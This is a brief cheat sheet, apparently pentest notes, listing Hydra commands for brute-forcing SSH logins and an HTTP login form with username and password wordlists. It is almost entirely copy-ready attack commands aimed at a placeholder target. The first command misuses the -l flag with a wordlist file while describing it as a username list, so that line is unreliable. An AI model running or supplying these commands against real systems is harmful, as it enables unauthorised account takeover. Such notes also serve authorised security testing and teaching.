Password Brute Using Hydra
Online password cracking against SSH/HTTP auth.
hydra -l /file/to/username/wordlist -P /file/to/password/wordlist ssh://<target> -t 4 -f
Hydra SSH brute forcing with a single username file and password list; -f stop on first found, -t threads.
hydra -l username -p /file/to/password/wordlist ssh://<target>
Hydra brute forcing the password only, as “username” would’ve been located from recon. If not, do a hydra brute force with a file to a username wordlist.
hydra -L users.txt -P passlist.txt -s 2222 ssh://<target>
Hydra using username list and password list; specify port with -s.
hydra -s 80 -L users.txt -P pass.txt http-form-post 'login.php:username=^USER^&password=^PASS^:F=incorrect'
HTTP form brute forcing (example pattern - adapt to form fields).